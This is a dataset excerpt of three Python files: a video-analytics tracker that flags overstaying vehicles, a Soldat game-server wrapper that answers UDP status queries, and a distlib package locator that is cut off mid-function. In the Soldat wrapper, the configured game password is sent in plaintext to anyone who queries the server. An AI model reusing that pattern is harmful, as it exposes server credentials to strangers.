source
stringlengths
3
86
python
stringlengths
75
1.04M
vehicle.py
from .agent import * from .record import Record from time import time from datetime import datetime import os PAR = True #Output base_dir = './output' #Storage Memory Parameter, forget vehicle if not seen > STORAGE_MEMORY STORAGE_MEMORY = 8 #Car x1y1 Distance Parameter DISTANCE_THRESHOLD = 10 #Feature Matching Parameters COSINE_UPPER_THRESH = 0.9 COSINE_LOWER_THRESH = 0.85 #Feature Smoothing Parameter FEATURE_MOMENTUM = 1 #Overstay Threshold CARPARK_BARRIER_THRESH = 60 PICKUP_POINT_THRESH = 180 def make_object_type(overstay): class Vehicle: current_id = 0 def __init__(self, feature, box): cls = type(self) self.id = str(cls.current_id) self.feature = feature self.box = box self.first_seen = self.last_seen = time() self.imgs = [] cls.current_id += 1 def __str__(self): return self.id @staticmethod def is_overstay(seconds): return seconds > overstay @staticmethod def is_alike(similarity): return similarity >= COSINE_UPPER_THRESH @staticmethod def is_far(delta): return delta > DISTANCE_THRESHOLD #Function to compare old and new box @staticmethod def within_limits(old_box, new_box): #x1 +- Thresh and y1 +- thresh if (old_box[0] + DISTANCE_THRESHOLD >= new_box[0] and old_box[0] - DISTANCE_THRESHOLD <= new_box[0] ) and (old_box[1] + DISTANCE_THRESHOLD >= new_box[1] and old_box[1] - DISTANCE_THRESHOLD <= new_box[1] ): return True else: return False return Vehicle class Storage: def __init__(self, object_type, memory=STORAGE_MEMORY): self.id_map = {} #Default memory = 180, else 60 self.memory = memory self.frames = [] self.object_type = object_type def add(self, feature, box): p = self.object_type(feature, box) self.id_map[p.id] = p #Original Register method def reg(self, feature, box): feature = np.array(feature, np.float32) #print(self.id_map.keys()) if len(self.id_map): #Query feature and get best match q = self.query(feature) p = self.id_map[q['id']] #If x1, y1 is within limits if self.object_type.within_limits(p.box, box) and q['similarity'] < COSINE_UPPER_THRESH and q['similarity'] >= COSINE_LOWER_THRESH: p.feature = p.feature * FEATURE_MOMENTUM + feature * (1-FEATURE_MOMENTUM) p.box = p.box * FEATURE_MOMENTUM + box * (1-FEATURE_MOMENTUM) #Update feature if similarity is high elif self.object_type.is_alike(q['similarity']): p.feature = p.feature * FEATURE_MOMENTUM + feature * (1-FEATURE_MOMENTUM) p.box = p.box * FEATURE_MOMENTUM + box * (1-FEATURE_MOMENTUM) #Register new vehicle if lower than thresh elif q['similarity'] < COSINE_LOWER_THRESH: self.add(feature, box) #print('Register') #Possible occlusion or too many similar vehicles in Storage else: pass #First case, if storage is empty add new vehicle else: #print('First Register') self.add(feature, box) def query(self, feature): assert len(self.id_map), 'no id in storage, register first!' similarity_lst = [] id_lst = [] for v in self.id_map.values(): similarity_lst += [self.compare(v.feature, feature)] id_lst += [v] idx = np.argmax(similarity_lst) id = id_lst[idx] sim = similarity_lst[idx] return {'id': str(id), 'similarity': similarity_lst[idx]} def forget(self): now = time() delete_keys = [] for k in self.id_map: if now - self.id_map[k].last_seen > self.memory: delete_keys.append(k) for k in delete_keys: del self.id_map[k] def add_video(frame): self.frames.append(frame) @staticmethod def compare(feature1, feature2): f1 = np.array(feature1) f2 = np.array(feature2) cos = np.dot(f1, f2)/np.linalg.norm(f1)/np.linalg.norm(f2) return cos # return np.exp(cos - 1) #Function to perform cropping based on tracking boxes def _crop(frame, trk_box): H, W, _ = frame.shape left, t, w, h = map(int, trk_box) left = max(left, 0) t = max(t, 0) r = min(left + w, W) b = min(t + h, H) crop = frame[t: b, left: r, :] return crop class VehicleAgent(Agent): #Scene 0 = Drop off point, scene 1 = barrier def __init__(self, source, detector_opt, host='localhost', scene = 0): super().__init__(source, host) #Debug mode self.debug = detector_opt.debug #Current date self.current_date = datetime.now().date() # - timedelta(days=1) #Create directories source_dir = source[source.find('@')+1:source.find('/cam')] self.source_dir = os.path.basename(source_dir) #Output directory self.output_dir = os.path.join(os.path.join(base_dir, str(self.source_dir)), str(self.current_date)) #Output log .txt self.output_log = os.path.join(self.output_dir + '/log.txt') #Create directory if it does not exist if not os.path.exists(self.output_dir): os.makedirs(self.output_dir) #self.q_reg = Queue(32) # register queue self.api_calls = {k: 0 for k in ['register', 'detection', 'feature', 'query', 'refresh', 'attributes', 'counts']} #If drop off point if scene == 0: self.storage = Storage(make_object_type(PICKUP_POINT_THRESH)) #self.OVERSTAY_THRESH = 180 #If carpark else: self.storage = Storage(make_object_type(CARPARK_BARRIER_THRESH)) #self.OVERSTAY_THRESH = 60 from .vehicle_agent.vehicle_detector import Vehicle_Detector #from .vehicle_agent.attribute import VehicleAttributes from .vehicle_agent.vehicle_attributes import Vehicle_Attributes from .vehicle_agent.vehicle_feature_extractor import Vehicle_Feature_Extractor #Initialise Detector Model #Increase conf_thresh if not carpark barrier scene if scene != 0: detector_opt.conf_thres = 0.3 self.vehicle_detector = Vehicle_Detector(detector_opt, scene) #Initialise Vehicle feature extractor self.vehicle_feature_extractor = Vehicle_Feature_Extractor() #Initialise Vehicle Attribute model #public github model self.vehicle_attribute = Vehicle_Attributes() #XZ Model #self.vehicle_attribute = VehicleAttributes() #Perform detection and push to output queue def det(img): detections = self.vehicle_detector.detect(img) return detections #Perform feature extraction and push to queue def ext(img): feature = self.vehicle_feature_extractor.get_features(img) return feature #Perform feature query on storage def query(feature): try: return self.storage.query(feature) except AssertionError: return {} #Perform Vehicle Attributes def var(t, img): ret = self.vehicle_attribute.predict(img) return t, ret #Function to put frame into Record object and push to queue def output(record, frame): record.add_frame(frame) return record, frame #Worker for detetion self.w_det = Worker(lambda x : (x, det(x)), debug = detector_opt.debug) self.w_var = Worker(lambda i, x: (i, var(i, x)), debug = detector_opt.debug) #Takes in Tracker Object and cropped image in process queue self.w_ext = Worker(lambda i, x : (i, ext(x)), debug = detector_opt.debug) #Takes in Tracker Object and Extracted features self.w_cmp = Worker(lambda i, x: (i, query(x)), debug = detector_opt.debug) #Worker containing the Record objects of overstayed objects self.w_record = Worker(lambda x, i: (x, output(x, i)), debug = detector_opt.debug) self.workers = [self.w_det, self.w_ext, self.w_cmp, self.w_var, self.w_record] self.matches = {} self.time0 = {} self.reported = set() #Create Thread object for each class instance and begin thread self.th = Thread(target=self.loop, daemon=True) self.th.start() #Function to push Track object and cropped image ROI for feature extraction def on_new_det(self, t:Track, img_roi): self.w_ext.put(t, img_roi) #Function to check current system date def check_date(self): if datetime.now().date() > self.current_date: print('Creating new directory for {}'.format(datetime.now().date())) #Update date and create new directory self.current_date = datetime.now().date() new_dir = os.path.join(os.path.join(base_dir, str(self.source_dir)), str(self.current_date)) os.makedirs(new_dir) #Change output directory and output log file paths self.output_dir = new_dir self.output_log = new_dir + '/log.txt' #Main loop def loop(self): while self.running: #Check date every 600 frames if self.frame_count % 600 == 0: self.check_date() if self.suspend == True: sleep(0.5) ret, frame = self.cap.read() if not ret or frame is None: self.cap = cv2.VideoCapture(self.source) continue frame_ = frame.copy() self.Track.step(frame_) if self.frame_count % INTEVAL == 0: #Push new frame into detection worker queue self.w_det.put(frame_) #Remove IDs that have not been seen for too long self.storage.forget() #Remove dead trackers self.Track.decay() self.api_calls['counts'] = len(self.Track.ALL) for t in self.Track.ALL: i = t.id now = time() if i in self.time0: seconds = now - self.time0[i] else: self.time0[i] = now seconds = 0 t.stay = seconds p = self.storage.id_map.get(i) if p is not None: p.last_seen = now if self.storage.object_type.is_overstay(seconds): if not hasattr(t, 'par'): self.w_var.put(t, _crop(frame_, t.box)) if hasattr(t, 'par'): output_path = os.path.join(self.output_dir, '{}_{}_{}'.format(i, '_'.join(t.par[1]), datetime.now())) if i not in self.reported: self.reported.add(i) print('[overstay] id:', i, '@', self.source) self.w_record.put(Record(output_path + '.avi'), frame_) cv2.imwrite(output_path + '.jpg', _crop(frame_, t.box)) with open(self.output_log, 'a') as f: message = 'Overstay id: {} Frame no: {} @ {}'.format(i, self.frame_count, self.source) f.write(message) #Perform post detection (KCF tracker) procedures and push to w_ext self._post_det_procedure(frame) #Perform post feature extraction, push to w_cmp queue for feature comparison and register in storage self._post_ext_procedure() #Perform post comparison procedures, set matches self._post_cmp_procedure(frame_) #Perform post par procedure self._post_par_procedure() #Render frame and add it to display worker queue self._render(frame) #Perform post output procedure self._post_output_procedure(frame) #self.display_queue.put(frame[...,::-1]) # give RGB self.display_queue.put(frame) self.frame_count += 1 self._kill_workers() #Function to convert YOLO bboxes def convert(self, boxes): boxes_ = [] for b in boxes: boxes_.append(b) boxes = np.array(boxes_) boxes[:, 2: 4] -= boxes[:, :2] return boxes[:, :4] #Function to perform post detection procedure def _post_det_procedure(self, frame = None): #If worker queue is not empty if self.w_det.has_feedback(): frame_, boxes = self.w_det.get() #if len(boxes): #If detection boxes are not empty, update track boxes if boxes is not None and boxes != []: #boxes = _cvt_ltrb2ltwh(boxes) boxes = self.convert(boxes) #self.plot_det_boxes(boxes, frame) self.Track.update(frame_, boxes) for t in self.Track.ALL: if t.visible: if isinstance(t.id, int): if t.age % REFRESH_INTEVAL == 0: if t.age // REFRESH_INTEVAL: self.api_calls['refresh'] += 1 img_roi = _crop(frame_, t.box) self.on_new_det(t, img_roi) else: for t in self.Track.ALL: t.visible = False t.health -= 1 if t.age > self.Track.PROBATION else 9999 #Function to perform post FE procedure def _post_ext_procedure(self): #If worker queue is not empty if self.w_ext.has_feedback(): t, feature = self.w_ext.get() #print(feature[0]) t.feature = feature[0] self.w_cmp.put(t, feature[0]) #print(t.velocity) #Introduce velocity filter if abs(t.velocity[0]) < 0.1 and abs(t.velocity[1]) < 0.1: self.storage.reg(feature[0], t.box) self.api_calls['register'] += 1 #Function perform feature similarity comparison def _post_cmp_procedure(self, frame_): if self.w_cmp.has_feedback(): t, ret = self.w_cmp.get() i = ret.get('id') if i is not None: t.similarity = ret.get('similarity') if t.similarity > COSINE_UPPER_THRESH: c = colors[hash(i or 0) % 256] # print(t.id, 'color', c) if i in self.matches: f = self.matches[i] if t > f: f.color = Track.color f.id = int(f.id) f.similarity = 0 self.matches[i] = t else: self.matches[i] = t self.matches[i].color = c self.matches[i].id = i def _post_par_procedure(self): if not self.w_var.p.empty(): t, att = self.w_var.get() setattr(t, 'par', att) #Function to perform post output procedure def _post_output_procedure(self, frame): if self.w_record.has_feedback(): current_record, _ = self.w_record.get() #If True, save video if current_record.check_save(): current_record.save_video() else: self.w_record.put(current_record, frame) #Render frame def _render(self, frame): #super()._render(frame) for t in self.Track.ALL: #Debugging mode, show track boxes if self.debug: t._render(frame) x, y, w, h = map(int, t.box) r = x + w b = y + h i = t.id now = time() if i in self.time0: seconds = now - self.time0[i] else: self.time0[i] = now seconds = 0 t.stay = seconds p = self.storage.id_map.get(i) if p is not None: p.last_seen = now #Show only overstay if self.storage.object_type.is_overstay(t.stay): cv2.rectangle(frame, (x, y), (r, b), t.color, 2) if t.visible: if hasattr(t, 'stay'): t.text(frame, 'sec:%d' % int(t.stay), x + 3, y + h - 3, .6, 2) if hasattr(t, 'par'): for item in t.par[1]: y += 20 cv2.putText(frame, str(item), (x + w + 3, y), cv2.FONT_HERSHEY_SIMPLEX, 1., t.color, 2) cv2.putText(frame, str(item), (x + w + 3, y), cv2.FONT_HERSHEY_SIMPLEX, 1., t.color, 2) return frame #Plot det boxes def plot_det_boxes(self, boxes, frame): for box in boxes: cv2.rectangle(frame, (box[0], box[1]), (box[0] + box[2], box[1] + box[3]), (255,0,0), 2)
soldat.py
import struct import sys import signal import subprocess import SocketServer import ConfigParser from threading import Thread from StringIO import StringIO def read_gamestat(): with open('logs/gamestat.txt') as fp: log = fp.read().splitlines() logdata = {} logdata['numplayers'] = int(log[1][9:]) logdata['mapname'] = log[2][5:] logdata['gametype'] = log[3][10:] logdata['timeleft'] = log[4][10:] teamscores = {} if logdata['gametype'] == "Capture the Flag" or logdata['gametype'] == "Infiltration": teamscores['alpha'] = int(log[5][8:]) teamscores['bravo'] = int(log[6][8:]) elif logdata['gametype'] == "Team Deathmatch": teamscores['alpha'] = int(log[5][8:]) teamscores['bravo'] = int(log[6][8:]) teamscores['charlie'] = int(log[7][8:]) teamscores['delta'] = int(log[8][8:]) logdata['teamscores'] = teamscores # And now for individual players. numplayers = logdata['numplayers'] playerdata = [] players_index = log.index('Players list: (name/kills/deaths/team/ping)') + 1 for i in xrange(numplayers): pos = players_index + (i * 5) name = log[pos] points = log[pos+1] deaths = log[pos+2] team = log[pos+3] ping = log[pos+4] player = { 'name': name, 'points': points, 'deaths': deaths, 'team': team, 'ping': ping } playerdata.append(player) logdata['players'] = playerdata return logdata def read_config(): cfg = ConfigParser.ConfigParser() with open('soldat.ini') as fp: cfg.readfp(fp) return cfg class ASEHandler(SocketServer.BaseRequestHandler): """ Request handler for ASE """ def handle(self): data, socket = self.request if data != 's': return response = StringIO() response.write('EYE1') def write_string(text): response.write(struct.pack('>B', len(text) + 1)) response.write(text) # Read useful data here cfg = read_config() # Parse game logs stat = read_gamestat() # Game name write_string('Soldat Server') # Port number write_string(cfg.get('NETWORK', 'Port')) # Server name write_string(cfg.get('NETWORK', 'Server_Name')) # Game type write_string(stat['gametype']) # Map name write_string(stat['mapname']) # Version write_string('1.6.7') # Passworded try: game_password = cfg.get('NETWORK', 'Game_Password') if not game_password: game_password = '0' write_string(game_password) except ConfigParser.NoOptionError: write_string('0') # Num players write_string(str(stat['numplayers'])) # Max players try: write_string(cfg.get('NETWORK', 'Max_Players')) except ConfigParser.NoOptionError: write_string('16') # Send raw data (we have no raw data?) write_string('') # Send players for player in stat['players']: flags = 0 flags |= 1 # Name flags |= 2 # Team # flags |= 4 # Skin flags |= 8 # Score flags |= 16 # Ping # flags |= 32 # Time response.write(struct.pack('>B', flags)) write_string(player['name']) # flags & 1 write_string(player['team']) # flags & 2 write_string(player['points']) # flags & 8 write_string(player['ping']) # flags & 16 # Send data socket.sendto(response.getvalue(), self.client_address) def main(): # Startup args = sys.argv[1:] proc = subprocess.Popen(['./soldatserver'] + args) cfg = read_config() try: ase_port = cfg.getint('NETWORK', 'Port') except (ConfigParser.NoSectionError, ConfigParser.NoOptionError): ase_port = 23073 ase_port += 123 server = SocketServer.UDPServer(('0.0.0.0', ase_port), ASEHandler) th = Thread(target=server.serve_forever) th.daemon = True th.start() def signal_handler(signum, frame): proc.send_signal(signum) server.shutdown() proc.wait() th.join() signal.signal(signal.SIGINT, signal_handler) signal.signal(signal.SIGTERM, signal_handler) exit_code = proc.wait() sys.exit(exit_code) if __name__ == '__main__': main()
locators.py
# -*- coding: utf-8 -*- # # Copyright (C) 2012-2013 Vinay Sajip. # Licensed to the Python Software Foundation under a contributor agreement. # See LICENSE.txt and CONTRIBUTORS.txt. # import gzip from io import BytesIO import json import logging import os import posixpath import re import threading import zlib from . import DistlibException from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url, queue, quote, unescape, string_types, build_opener, HTTPRedirectHandler as BaseRedirectHandler, Request, HTTPError, URLError) from .database import Distribution, DistributionPath, make_dist from .metadata import Metadata from .util import (cached_property, parse_credentials, ensure_slash, split_filename, get_project_data, parse_requirement, parse_name_and_version, ServerProxy) from .version import get_scheme, UnsupportedVersionError from .wheel import Wheel, is_compatible logger = logging.getLogger(__name__) HASHER_HASH = re.compile('^(\w+)=([a-f0-9]+)') CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I) HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml') DEFAULT_INDEX = 'http://python.org/pypi' def get_all_distribution_names(url=None): """ Return all distribution names known by an index. :param url: The URL of the index. :return: A list of all known distribution names. """ if url is None: url = DEFAULT_INDEX client = ServerProxy(url, timeout=3.0) return client.list_packages() class RedirectHandler(BaseRedirectHandler): """ A class to work around a bug in some Python 3.2.x releases. """ # There's a bug in the base version for some 3.2.x # (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header # returns e.g. /abc, it bails because it says the scheme '' # is bogus, when actually it should use the request's # URL for the scheme. See Python issue #13696. def http_error_302(self, req, fp, code, msg, headers): # Some servers (incorrectly) return multiple Location headers # (so probably same goes for URI). Use first header. newurl = None for key in ('location', 'uri'): if key in headers: newurl = headers[key] break if newurl is None: return urlparts = urlparse(newurl) if urlparts.scheme == '': newurl = urljoin(req.get_full_url(), newurl) if hasattr(headers, 'replace_header'): headers.replace_header(key, newurl) else: headers[key] = newurl return BaseRedirectHandler.http_error_302(self, req, fp, code, msg, headers) http_error_301 = http_error_303 = http_error_307 = http_error_302 class Locator(object): """ A base class for locators - things that locate distributions. """ source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz') binary_extensions = ('.egg', '.exe', '.whl') excluded_extensions = ('.pdf',) # A list of tags indicating which wheels you want to match. The default # value of None matches against the tags compatible with the running # Python. If you want to match other values, set wheel_tags on a locator # instance to a list of tuples (pyver, abi, arch) which you want to match. wheel_tags = None downloadable_extensions = source_extensions + ('.whl',) def __init__(self, scheme='default'): """ Initialise an instance. :param scheme: Because locators look for most recent versions, they need to know the version scheme to use. This specifies the current PEP-recommended scheme - use ``'legacy'`` if you need to support existing distributions on PyPI. """ self._cache = {} self.scheme = scheme # Because of bugs in some of the handlers on some of the platforms, # we use our own opener rather than just using urlopen. self.opener = build_opener(RedirectHandler()) # If get_project() is called from locate(), the matcher instance # is set from the requirement passed to locate(). See issue #18 for # why this can be useful to know. self.matcher = None def clear_cache(self): self._cache.clear() def _get_scheme(self): return self._scheme def _set_scheme(self, value): self._scheme = value scheme = property(_get_scheme, _set_scheme) def _get_project(self, name): """ For a given project, get a dictionary mapping available versions to Distribution instances. This should be implemented in subclasses. If called from a locate() request, self.matcher will be set to a matcher for the requirement to satisfy, otherwise it will be None. """ raise NotImplementedError('Please implement in the subclass') def get_distribution_names(self): """ Return all the distribution names known to this locator. """ raise NotImplementedError('Please implement in the subclass') def get_project(self, name): """ For a given project, get a dictionary mapping available versions to Distribution instances. This calls _get_project to do all the work, and just implements a caching layer on top. """ if self._cache is None: result = self._get_project(name) elif name in self._cache: result = self._cache[name] else: result = self._get_project(name) self._cache[name] = result return result def score_url(self, url): """ Give an url a score which can be used to choose preferred URLs for a given project release. """ t = urlparse(url) return (t.scheme != 'https', 'pypi.python.org' in t.netloc, posixpath.basename(t.path)) def prefer_url(self, url1, url2): """ Choose one of two URLs where both are candidates for distribution archives for the same version of a distribution (for example, .tar.gz vs. zip). The current implement favours http:// URLs over https://, archives from PyPI over those from other locations and then the archive name. """ result = url2 if url1: s1 = self.score_url(url1) s2 = self.score_url(url2) if s1 > s2: result = url1 if result != url2: logger.debug('Not replacing %r with %r', url1, url2) else: logger.debug('Replacing %r with %r', url1, url2) return result def split_filename(self, filename, project_name): """ Attempt to split a filename in project name, version and Python version. """ return split_filename(filename, project_name) def convert_url_to_download_info(self, url, project_name): """ See if a URL is a candidate for a download URL for a project (the URL has typically been scraped from an HTML page). If it is, a dictionary is returned with keys "name", "version", "filename" and "url"; otherwise, None is returned. """ def same_project(name1, name2): name1, name2 = name1.lower(), name2.lower() if name1 == name2: result = True else: # distribute replaces '-' by '_' in project names, so it # can tell where the version starts in a filename. result = name1.replace('_', '-') == name2.replace('_', '-') return result result = None scheme, netloc, path, params, query, frag = urlparse(url) if frag.lower().startswith('egg='): logger.debug('%s: version hint in fragment: %r', project_name, frag) m = HASHER_HASH.match(frag) if m: algo, digest = m.groups() else: algo, digest = None, None origpath = path if path and path[-1] == '/': path = path[:-1] if path.endswith('.whl'): try: wheel = Wheel(path) if is_compatible(wheel, self.wheel_tags): if project_name is None: include = True else: include = same_project(wheel.name, project_name) if include: result = { 'name': wheel.name, 'version': wheel.version, 'filename': wheel.filename, 'url': urlunparse((scheme, netloc, origpath, params, query, '')), 'python-version': ', '.join( ['.'.join(list(v[2:])) for v in wheel.pyver]), } except Exception as e: logger.warning('invalid path for wheel: %s', path) elif path.endswith(self.downloadable_extensions): path = filename = posixpath.basename(path) for ext in self.downloadable_extensions: if path.endswith(ext): path = path[:-len(ext)] t = self.split_filename(path, project_name) if not t: logger.debug('No match for project/version: %s', path) else: name, version, pyver = t if not project_name or same_project(project_name, name): result = { 'name': name, 'version': version, 'filename': filename, 'url': urlunparse((scheme, netloc, origpath, params, query, '')), #'packagetype': 'sdist', } if pyver: result['python-version'] = pyver break if result and algo: result['%s_digest' % algo] = digest return result def _get_digest(self, info): """ Get a digest from a dictionary by looking at keys of the form 'algo_digest'. Returns a 2-tuple (algo, digest) if found, else None. Currently looks only for SHA256, then MD5. """ result = None for algo in ('sha256', 'md5'): key = '%s_digest' % algo if key in info: result = (algo, info[key]) break return result def _update_version_data(self, result, info): """ Update a result dictionary (the final result from _get_project) with a dictionary for a specific version, whih typically holds information gleaned from a filename or URL for an archive for the distribution. """ name = info.pop('name') version = info.pop('version') if version in result: dist = result[version] md = dist.metadata else: dist = make_dist(name, version, scheme=self.scheme) md = dist.metadata dist.digest = self._get_digest(info) if md.source_url != info['url']: md.source_url = self.prefer_url(md.source_url, info['url']) dist.locator = self result[version] = dist def locate(self, requirement, prereleases=False): """ Find the most recent distribution which matches the given requirement. :param requirement: A requirement of the form 'foo (1.0)' or perhaps 'foo (>= 1.0, < 2.0, != 1.3)' :param prereleases: If ``True``, allow pre-release versions to be located. Otherwise, pre-release versions are not returned. :return: A :class:`Distribution` instance, or ``None`` if no such distribution could be located. """ result = None r = parse_requirement(requirement) if r is None: raise DistlibException('Not a valid requirement: %r' % requirement) scheme = get_scheme(self.scheme) self.matcher = matcher = scheme.matcher(r.requirement) logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__) versions = self.get_project(r.name) if versions: # sometimes, versions are invalid slist = [] vcls = matcher.version_class for k in versions: try: if not matcher.match(k): logger.debug('%s did not match %r', matcher, k) else: if prereleases or not vcls(k).is_prerelease: slist.append(k) else: logger.debug('skipping pre-release ' 'version %s of %s', k, matcher.name) except Exception: logger.warning('error matching %s with %r', matcher, k) pass # slist.append(k) if len(slist) > 1: slist = sorted(slist, key=scheme.key) if slist: logger.debug('sorted list: %s', slist) result = versions[slist[-1]] if result and r.extras: result.extras = r.extras self.matcher = None return result class PyPIRPCLocator(Locator): """ This locator uses XML-RPC to locate distributions. It therefore cannot be used with simple mirrors (that only mirror file content). """ def __init__(self, url, **kwargs): """ Initialise an instance. :param url: The URL to use for XML-RPC. :param kwargs: Passed to the superclass constructor. """ super(PyPIRPCLocator, self).__init__(**kwargs) self.base_url = url self.client = ServerProxy(url, timeout=3.0) def get_distribution_names(self): """ Return all the distribution names known to this locator. """ return set(self.client.list_packages()) def _get_project(self, name): result = {} versions = self.client.package_releases(name, True) for v in versions: urls = self.client.release_urls(name, v) data = self.client.release_data(name, v) metadata = Metadata(scheme=self.scheme) metadata.name = data['name'] metadata.version = data['version'] metadata.license = data.get('license') metadata.keywords = data.get('keywords', []) metadata.summary = data.get('summary') dist = Distribution(metadata) if urls: info = urls[0] metadata.source_url = info['url'] dist.digest = self._get_digest(info) dist.locator = self result[v] = dist return result class PyPIJSONLocator(Locator): """ This locator uses PyPI's JSON interface. It's very limited in functionality nad probably not worth using. """ def __init__(self, url, **kwargs): super(PyPIJSONLocator, self).__init__(**kwargs) self.base_url = ensure_slash(url) def get_distribution_names(self): """ Return all the distribution names known to this locator. """ raise NotImplementedError('Not available from this locator') def _get_project(self, name): result = {} url = urljoin(self.base_url, '%s/json' % quote(name)) try: resp = self.opener.open(url) data = resp.read().decode() # for now d = json.loads(data) md = Metadata(scheme=self.scheme) data = d['info'] md.name = data['name'] md.version = data['version'] md.license = data.get('license') md.keywords = data.get('keywords', []) md.summary = data.get('summary') dist = Distribution(md) urls = d['urls'] if urls: info = urls[0] md.source_url = info['url'] dist.digest = self._get_digest(info) dist.locator = self result[md.version] = dist except Exception as e: logger.exception('JSON fetch failed: %s', e) return result class Page(object): """ This class represents a scraped HTML page. """ # The following slightly hairy-looking regex just looks for the contents of # an anchor link, which has an attribute "href" either immediately preceded # or immediately followed by a "rel" attribute. The attribute values can be # declared with double quotes, single quotes or no quotes - which leads to # the length of the expression. _href = re.compile(""" (rel\s*=\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\s\n]*))\s+)? href\s*=\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\s\n]*)) (\s+rel\s*=\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\s\n]*)))? """, re.I | re.S | re.X) _base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S) def __init__(self, data, url): """ Initialise an instance with the Unicode page contents and the URL they came from. """ self.data = data self.base_url = self.url = url m = self._base.search(self.data) if m: self.base_url = m.group(1) _clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I) @cached_property def links(self): """ Return the URLs of all the links on a page together with information about their "rel" attribute, for determining which ones to treat as downloads and which ones to queue for further scraping. """ def clean(url): "Tidy up an URL." scheme, netloc, path, params, query, frag = urlparse(url) return urlunparse((scheme, netloc, quote(path), params, query, frag)) result = set() for match in self._href.finditer(self.data): d = match.groupdict('') rel = (d['rel1'] or d['rel2'] or d['rel3'] or d['rel4'] or d['rel5'] or d['rel6']) url = d['url1'] or d['url2'] or d['url3'] url = urljoin(self.base_url, url) url = unescape(url) url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url) result.add((url, rel)) # We sort the result, hoping to bring the most recent versions # to the front result = sorted(result, key=lambda t: t[0], reverse=True) return result class SimpleScrapingLocator(Locator): """ A locator which scrapes HTML pages to locate downloads for a distribution. This runs multiple threads to do the I/O; performance is at least as good as pip's PackageFinder, which works in an analogous fashion. """ # These are used to deal with various Content-Encoding schemes. decoders = { 'deflate': zlib.decompress, 'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(d)).read(), 'none': lambda b: b, } def __init__(self, url, timeout=None, num_workers=10, **kwargs): """ Initialise an instance. :param url: The root URL to use for scraping. :param timeout: The timeout, in seconds, to be applied to requests. This defaults to ``None`` (no timeout specified). :param num_workers: The number of worker threads you want to do I/O, This defaults to 10. :param kwargs: Passed to the superclass. """ super(SimpleScrapingLocator, self).__init__(**kwargs) self.base_url = ensure_slash(url) self.timeout = timeout self._page_cache = {} self._seen = set() self._to_fetch = queue.Queue() self._bad_hosts = set() self.skip_externals = False self.num_workers = num_workers self._lock = threading.RLock() def _prepare_threads(self): """ Threads are created only when get_project is called, and terminate before it returns. They are there primarily to parallelise I/O (i.e. fetching web pages). """ self._threads = [] for i in range(self.num_workers): t = threading.Thread(target=self._fetch) t.setDaemon(True) t.start() self._threads.append(t) def _wait_threads(self): """ Tell all the threads to terminate (by sending a sentinel value) and wait for them to do so. """ # Note that you need two loops, since you can't say which # thread will get each sentinel for t in self._threads: self._to_fetch.put(None) # sentinel for t in self._threads: t.join() self._threads = [] def _get_project(self, name): self.result = result = {} self.project_name = name url = urljoin(self.base_url, '%s/' % quote(name)) self._seen.clear() self._page_cache.clear() self._prepare_threads() try: logger.debug('Queueing %s', url) self._to_fetch.put(url) self._to_fetch.join() finally: self._wait_threads() del self.result return result platform_dependent = re.compile(r'\b(linux-(i\d86|x86_64|arm\w+)|' r'win(32|-amd64)|macosx-?\d+)\b', re.I) def _is_platform_dependent(self, url): """ Does an URL refer to a platform-specific download? """ return self.platform_dependent.search(url) def _process_download(self, url): """ See if an URL is a suitable download for a project. If it is, register information in the result dictionary (for _get_project) about the specific version it's for. Note that the return value isn't actually used other than as a boolean value. """ if self._is_platform_dependent(url): info = None else: info = self.convert_url_to_download_info(url, self.project_name) logger.debug('process_download: %s -> %s', url, info) if info: with self._lock: # needed because self.result is shared self._update_version_data(self.result, info) return info def _should_queue(self, link, referrer, rel): """ Determine whether a link URL from a referring page and with a particular "rel" attribute should be queued for scraping. """ scheme, netloc, path, _, _, _ = urlparse(link) if path.endswith(self.source_extensions + self.binary_extensions + self.excluded_extensions): result = False elif self.skip_externals and not link.startswith(self.base_url): result = False elif not referrer.startswith(self.base_url): result = False elif rel not in ('homepage', 'download'): result = False elif scheme not in ('http', 'https', 'ftp'): result = False elif self._is_platform_dependent(link): result = False else: host = netloc.split(':', 1)[0] if host.lower() == 'localhost': result = False else: result = True logger.debug('should_queue: %s (%s) from %s -> %s', link, rel, referrer, result) return result def _fetch(self): """ Get a URL to fetch from the work queue, get the HTML page, examine its links for download candidates and candidates for further scraping. This is a handy method to run in a thread. """ while True: url = self._to_fetch.get() try: if url: page = self.get_page(url) if page is None: # e.g. after an error continue for link, rel in page.links: if link not in self._seen: self._seen.add(link) if (not self._process_download(link) and self._should_queue(link, url, rel)): logger.debug('Queueing %s from %s', link, url) self._to_fetch.put(link) finally: # always do this, to avoid hangs :-) self._to_fetch.task_done() if not url: #logger.debug('Sentinel seen, quitting.') break def get_page(self, url): """ Get the HTML for an URL, possibly from an in-memory cache. XXX TODO Note: this cache is never actually cleared. It's assumed that the data won't get stale over the lifetime of a locator instance (not necessarily true for the default_locator). """ # http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api scheme, netloc, path, _, _, _ = urlparse(url) if scheme == 'file' and os.path.isdir(url2pathname(path)): url = urljoin(ensure_slash(url), 'index.html') if url in self._page_cache: result = self._page_cache[url] logger.debug('Returning %s from cache: %s', url, result) else: host = netloc.split(':', 1)[0] result = None if host in self._bad_hosts: logger.debug('Skipping %s due to bad host %s', url, host) else: req = Request(url, headers={'Accept-encoding': 'identity'}) try: logger.debug('Fetching %s', url) resp = self.opener.open(req, timeout=self.timeout) logger.debug('Fetched %s', url) headers = resp.info() content_type = headers.get('Content-Type', '') if HTML_CONTENT_TYPE.match(content_type): final_url = resp.geturl() data = resp.read() encoding = headers.get('Content-Encoding') if encoding: decoder = self.decoders[encoding] # fail if not found data = decoder(data) encoding = 'utf-8' m = CHARSET.search(content_type) if m: encoding = m.group(1) try: data = 